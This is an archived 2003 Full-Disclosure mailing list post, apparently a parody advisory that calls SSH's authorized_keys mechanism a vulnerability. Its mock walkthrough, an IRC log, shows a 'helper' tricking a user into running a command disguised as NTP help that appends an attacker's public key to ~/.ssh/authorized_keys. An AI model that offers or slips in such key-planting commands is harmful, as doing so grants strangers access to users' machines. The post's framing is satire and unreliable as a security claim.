lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <200303042218.h24MIKiY003216@mailserver2.hushmail.com>
From: diacetyl at hushmail.com (diacetyl@...hmail.com)
Subject: SSH/OPENSSH HOLE ALL VERSIONS.

-----BEGIN PGP SIGNED MESSAGE-----

I. BACKGROUND

(stolen from manpage)
     ssh (SSH client) is a program for logging into a remote machine and for
     executing commands on a remote machine.  It is intended to replace rlogin
     and rsh, and provide secure encrypted communications between two untrust­
     ed hosts over an insecure network.  X11 connections and arbitrary TCP/IP
     ports can also be forwarded over the secure channel.

II. DESCRIPTION

The ssh command contains an innate system of backdooring that can be levereged
by an attacker to gain the access of another user.

The crux of this problem lies in the face that any public key dropped to
~/.ssh/authorized_keys may be used to gain entry to the machine under the
priveledges of that user by he who posesses the corresponding private key.

III. ANALYSIS

A user who can successfully convince another user to write his ssh public key
to ~/.ssh/authorized_keys will be able to gain access to that machine under
that user's priveledges.

The following is a sample walkthrough of a successful exploitation of this
vulnerability.

·f· zerofel [~zerofel@...8n2fls33o1215.telia.com] has joined #linuxhelp
<zerofel> how do i use ntp to set my time?
<sup3rfo0> echo ntp;echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsWihy/NGclBRhEVNgQezRGSx9D0AMqDY/eGYMNW9WlO/szVRKrlGYpMmsvOen/Kcocz0TxDPDZXLGGDL0U77A036WBIL64HPAg3ADteSa1heDJjxUWMa45Aj0bhBEJCofkraasOwxTgKYe6KXCKQu9GOS+VoCYUSSJtUk11G+tE= unf@...ptamine">~/.ssh/authorized_keys
<sup3rfo0> that should do it
<zerofel> okay but my date still isnt set
<sup3rfo0> hmm paste the output of ls ~
<zerofel> bash-2.05$ ls
<zerofel> HAHA_I_DELETED_ALL_YOUR_FILES
<zerofel> WTF

IV. VENDOR RESPONSE

I have informed ssh developers about this vulnerability and they have not
replied. I am forced to disclose this gaping vulnerability to force them
to patch the bug.

V. PROPS

iDEFENSE for their elite file advisory
http://lists.netsys.com/pipermail/full-disclosure/2003-March/004423.html
these warriors of full-disclosure give me the courage to release this
vulnerability even after death threats from evil blackhats who shut off
my power, ruined my credit, and got me fired from my job.
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wl0EARECAB0FAj5lJDUWHGRpYWNldHlsQGh1c2htYWlsLmNvbQAKCRAP/IU00usAJvBh
AJ9yTHe1KNHGyEEWMknulotpkCe9BACfSYTDyMGrzGVcLs9XdQuqKP/04bA=
=4Mdu
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ